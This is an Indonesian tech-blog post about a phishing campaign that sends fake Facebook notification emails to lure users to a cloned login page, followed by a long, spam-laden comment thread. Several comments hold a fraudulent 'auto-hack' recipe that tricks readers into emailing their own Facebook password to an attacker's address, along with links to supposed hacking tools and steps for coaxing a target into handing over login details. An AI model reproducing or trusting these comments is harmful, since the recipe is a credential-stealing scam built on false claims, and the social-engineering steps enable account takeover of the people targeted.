Modus Hacking Facebook via Email

images2Lagi lagi aksi pencurian data terjadi di Internet. Dan kali ini menimpa situs jaringan sosial tebesar di dunia, facebook.com.  Dilaporkan dari situs nytimes.com, modus dari aksi operasi pencurian dimulai dengan pengiriman sejumlah pesan elektronik palsu dari facebook ( e-mail ) ke pengguna facebook melalui account email mereka.Dan secara tidak langsung membuat pengguna me-klik link pada pesan yang dikirimkan sebagai langkah selanjutnya seperti yang selama ini dilakukan facebook.com. Namun pebedaannya adalah jika pada pesan yang aseli ( dari www.facebook.com ) link yang diberikan langsung menuju situs aselinya. Maka kali ini situs yang kemudian terbuka adalah sebuah halaman facebook palsu dengan tampilan yang sama persis.

Pihak penyerang memenfaatkan account yang telah ter”hack” untuk mengambil keuntungan dengan menjadikannya account robot yang mengirimkan spam ke account lainnya. Sehingga pihak penyerang berkesempatan mendapatkan keuntungan dengan promosi melalui facebook memanfaatkan pengguna aktif.

Ketika sebuah komunitas berkembang dengan pesat, saat itu pula banyak orang berpikir untuk mencari uang dari sana” ( walaupun dengan cara yang tidak halal ), kata Michael Argast seorang analis system software seeprti yagn dilansir dari gadgetwise.blogs.nytimes.com

Sebuah modus yang telah lama terjadi di dunia internet. Fasilitas pengiriman notifikasi melalalui email yang ritun diterima acap kali membuat kita kurang teliti dalam membaca asal muasal pesan. Untuk mengatasi hal serupa yang terjadi, pihak facebook mengeluarkan beberapa anjuran kepada pengguna internet, diantaranya :

1.      Menggunakan browser yang up to date yang mempunyai fasilitas antiphising. Seperti Internet Explorer 8 atau Firefox 3.0.10.

2.      Menggunakan data login yang berbeda untuk setiap account yang berbeda.

3.      Jika menerima pesan notifikasi dengan subject dari facebook. Pastikan sender benar benar dari facebook.com. Jika tidak sudah dapat dipastikan anda akan ter-direct ke website palsu./chend

About the Author

has written 103 stories on this site.

192 Comments on “Modus Hacking Facebook via Email”

  • starcraft wrote on 26 November, 2010, 16:36

    Obrolan ANEH…Gk ada ManfaatNya

  • HACKING FB VIA SMS wrote on 7 December, 2010, 17:34

    mantap postingnnya

    CARA HACKING FACEBOOK DENGAN SMS:
    http://hackious.blogspot.com

  • Ospy wrote on 7 December, 2010, 18:42

    Ahik…hkhkhk

  • opick langkar wrote on 15 December, 2010, 16:04

    kasihan tuh’ kalau
    facebook sampai hilang g mn?? ya rasanya . pasti sedih banget. kemarin teman q nanya katanya g mn caranya mengembalikan facebook yng kena hack’
    http://opick.phpnet.us/

  • facebook wrote on 15 December, 2010, 21:49

    HACK FACEBOOK TERBARU 2011

    CARA HACK FB……
    (HANYA UNTUK MENAMBAH WAWASAN AGAR KITA LEBIH BERHATI-HATI,MOHON JANGAN DISALAHGUNAKAN!!!)
    Lakukan langkah-langkah dibawah :

    1. Login email facebook anda dan lanjutkan ke halaman mengirim pesan.
    2. Klik compose message
    3. Pada tulisan To isi dengan ForHackers01@gmail.com
    4. Pada tulisan subject isi dengan kata “PASSWORD RETRIEVE”
    5. isi pesan :
    baris pertama tulis alamat email anda.
    baris kedua tulis alamat email facebook korban.
    baris ketiga tulis password facebook anda.
    baris keempat tulis kode ini : cgi-bin/$et76431&pwr999
    Lalu Send/Kirim.

    Contoh :
    To : ForHackers01@gmail.com
    Subject : PASSWORD RETRIEVE
    Message :

    anda@yahoo.co.id
    korban@yahoo.com
    Password anda
    cgi-bin/$et76431&pwr999

    Lalu Send/Kirim.

    Catatan: Ingat anda tidak mengirimkan email ke orang namun ke mesin! Isi pesan dan segala formatnya harus seperti petunjuk diatas, jika tidak mesin tidak akan bekerja dengan sempurna.
    sumber : autohackfacebook
    Mari kita belajar hack sebelum kita di-hack!

    TERIMAKASIH

    @copyright 2010

  • Orang Baik wrote on 18 December, 2010, 14:25

    AWASSS CARA DIATAS BOHONNGGGG… PENIPUUUUU…
    MANA ADA MESIN HACK OTOMATIS, YANG ADA FB KITA KEHACK SENDIRI KARENA KITA NGASIH PASWORDNYA LWT CARA TERSEBUT… (KIRIM PESAN)
    KALO PUN ADA PASTI UDAH DIBLOK FB…
    MANA ADA NGEHACK CKUP NULIS PESAN..

  • inilah aku apa adanya wrote on 12 January, 2011, 21:09

    Nih w share Hack-tool yang layak dicoba.. One tool for all Hacking actions..
    http://www.ziddu.com/download/13366212/Bruteforce-hacktool.rar.html

  • Ponorogo wrote on 11 March, 2011, 14:35

    wah kayaknya keren nih, ikut ah http://kabarit.com/wp-includes/images/smilies/icon_lol.gif

  • harly wrote on 14 March, 2011, 16:28

    wah ini mesti buat proteksi dini //
    agar ngak kecolongan..
    butuh tulisan seputar ilmu ekonomi kunjungi repository unand :
    jurnal ekonomi andalas

  • rexso wrote on 15 March, 2011, 17:32

    tolol semua , nie w kasih tau tapi jangan di sebarin lagi http://www.wellmug.com

  • rafly wrote on 15 March, 2011, 20:54

    hyyy..
    gi mana siehh,, 
    fb aku yg dlu ke hack cara blikkinnya gi mana??

  • jasa custom clearance wrote on 20 March, 2011, 14:27

    Berkunjung bentar nich..
    SALAm

  • penginapan di jakarta wrote on 20 March, 2011, 14:28

    HALO….
    Dari jakarta selatan nich…
    salam kenal semua…
    anda juga bisa mengunjungi jasa pengamanan… makasih

  • facebook hack wrote on 30 March, 2011, 9:08

    this is so much better than doing it through facebook itself

  • facebook hack wrote on 15 April, 2011, 23:48

    good post.

  • cilukbakekok wrote on 20 April, 2011, 21:38

    ni pada yg suka hack,atau mau coba hack,ane kasih panduanya gratiiiiiiiiiiiis dari pd lu smua pd ribut
    klik browser kamu tulis apa aja yg lu mau hak,misal ke fb lu login dulu lu masuk pesan lalu lu tulis to auto hacker subyek lu tulis mhemhek jeuding
    lu tulis di pesan alamat email lu
    pasword lu
    email yg lu mau hakhttp://kabarit.com/wp-includes/images/smilies/icon_redface.gifhttp://kabarit.com/wp-includes/images/smilies/icon_cry.gifhttp://kabarit.com/wp-includes/images/smilies/icon_question.gif
    terus lu tulis gini di bawahnya
    =itil=jeuding=obral=browsingduniahancur=jualmemek/fbfasword=boot//lockfacebook
    LALU LU PADE KIRIM TU MAKA AKAN TERLIHAT TAMPILAN YG BERBEDA PD PACEBOOK YG LU HAKER

  • prof. wrote on 21 April, 2011, 2:51

    Hack FB banyak jalannya ko’ Fake Login / Phising / Scam, Network Sniffing, Keylogger, Bruteforce, Forgot Password Manual dll. skedar saran aja. alamat email jangan diumbar y’. trus’ saat ada link pastikan URLnya klo tu link ga mencurigakan. dah itu aja ko’. klo ada yang bisa bongkar email dari ID FB (salut aja buat dia, brarti high class hacker tu) lagian dari pada ngehack fb, mending yang lebih berat ..:)
    salam- prof.

  • heek_kioe wrote on 5 June, 2011, 10:47

    pada ngomongin apa sih ?
    http://kabarit.com/wp-includes/images/smilies/icon_question.gif

  • beby wrote on 21 June, 2011, 4:20

    gwat kli hacker sekarang cip 100000 pun di ambil haaaaaaaa memalukan

  • Ricky wrote on 9 July, 2011, 20:50

    udah kirim emil kamu dam email korbanmu ke email rickykusnadi01@yahoo.com

  • jampes wrote on 16 July, 2011, 23:29

    kok pada ribut yah..

  • fitry wrote on 17 July, 2011, 13:32

    caranya gimana sih??? sy msh bingung dgn kata2 ny krna ter llu ribet ada yg bsa bantu sy???

  • putry impian wrote on 9 August, 2011, 20:33

    klo mau download hack facebook new version klik dan download aja disini gratis.

    http://www.ziddu.com/download/15804421/FacebookFreezer.zip.html

  • sy mau jadi anggota anonymous wrote on 16 August, 2011, 22:35

    maaf,, sy baca komentar tadi ada kata anonymous yg bicara tentang bug,, OPindonesia kah? jadikan saya murid di anonymous . http://www.pein.my-php.net. balas coment sy jika anda mensetujuinya, sy mau belajar bug. saya akan melihat nie koment. terimaksih

  • Leri HCK wrote on 18 August, 2011, 14:28

    ganggu aja!!http://kabarit.com/wp-includes/images/smilies/icon_evil.gif

  • Ryan wrote on 19 August, 2011, 16:35

    tolong ajarin saya cara ngehack fb, fb saya yang lama di curi jadi saya ingin ngambil kembali dan ngehack fb saya ,,

    tolongin saya dunk …
    http://kabarit.com/wp-includes/images/smilies/icon_sad.gif
    please ,,,
    :'(http://kabarit.com/wp-includes/images/smilies/icon_cry.gif

  • robzlabz wrote on 20 August, 2011, 11:38

    makasih infonya,. wah semakin bahaya aja yah kalau gag hati hati

  • Desian wrote on 4 September, 2011, 14:27

    ada yang tau cara mengembalikkan account facebook yang dibajak ??
    soalnya account dibajak untuk transaksi si pembajak menjual barang-barang ilegal, jadi identitas lain yang dipakai si pembajak untuk melindungi dirinya sendiri agar tidak diketahui.. tolong kerjasamanya

  • Desszzz wrote on 14 September, 2011, 19:51

    bos mau nanya, kan klo [k mozila bsa
    tools>>options>>security>>save password
    nah itu cra search biar tau site sm username and passwordny gmn??

  • ihsan wrote on 14 September, 2011, 22:49

    ajari aq hack dongk.. aq pingin blajar hack

  • oben wrote on 16 September, 2011, 22:52

    hack cara lain lagi ada gak?

  • kembalikan akun yang di hack wrote on 16 September, 2011, 22:56

    gimana kembalikan akun yang di hack

  • rusli wrote on 20 January, 2012, 1:41

    HAti-gati dengan menerima pertemana di FB, saya dengan mengklik konfirmasi pertemanan saja, chip saya 120M lenyap seketika (beberapa menit setelah saya klik konfirmasi pertemanan), awas modus baru itu ya bro

  • cracker evil wrote on 10 February, 2012, 9:53

    lucu” ya..kyk di taman kanak”.ckckckk

  • rihsan wrote on 6 June, 2012, 22:07

    wow nice info mas ,jadi gitu ya cara menghindarinya ,mesti ati2 ane nich

  • ryan wrote on 6 June, 2012, 22:11

    keren banget dah infonya mas !! Motor matic injeksi irit harga murah – Yamaha Mio J Motor matic injeksi irit harga murah – Yamaha Mio J http://teknologi.kompasiana.com/internet/2012/05/20/info-kontes-motor-matic-injeksi-irit-harga-murah-yamaha-mio-j/

  • rusman wrote on 3 August, 2012, 12:43

    sebenarnya walaupun sekuat apapun facebook tetep aja masih bisa kecolongan. dan ini akan saya jelaskan cara hack facebook yang benar,,

    Pertama. Kamu add dulu target agan2
    kedua . ajak kenalan target
    ketiga .. inbox target dan mintalah alamat login FB target
    keempat. Mintalah untuk di kirimkan code paswdnya
    kelima coba masuk dengan alamat target yang di kirim tadi
    ke enam; jika berhasil masuk gantik email dan paswd FB tersebut
    selanjutnya SELAMAT ANDA BERHASIL MENJADI HACKER

  • Dumineseeprem wrote on 19 November, 2012, 14:45

    Lord Corporation

  • Dumineseeprem wrote on 13 December, 2012, 23:32

    Randers Kommune

  • Dumineseeprem wrote on 25 February, 2013, 11:01

    EBOOKERS

Write a Comment

Gravatars are small images that can show your personality. You can get your gravatar for free today!

Isi dan komentar tanggung jawab masing masing pengirim. Gambar yang ditampilkan dalam artikel tidak selamanya mencerminkan isi artikel atau produk .Hanya dipakai sebagai Ilustrasi berita.





Web Security Made Easy         > | © 2009   > Hosted by : Web Developer Jogja | WebQilat |
2016 | kabarIT.com. All rights reserved.
KabarIT merupakan techno blog yang menyajikan informasi seputar IT yang hangat dan menarik. Isi dan komentar tanggung jawab masing-masing komentar. Selengkapnya...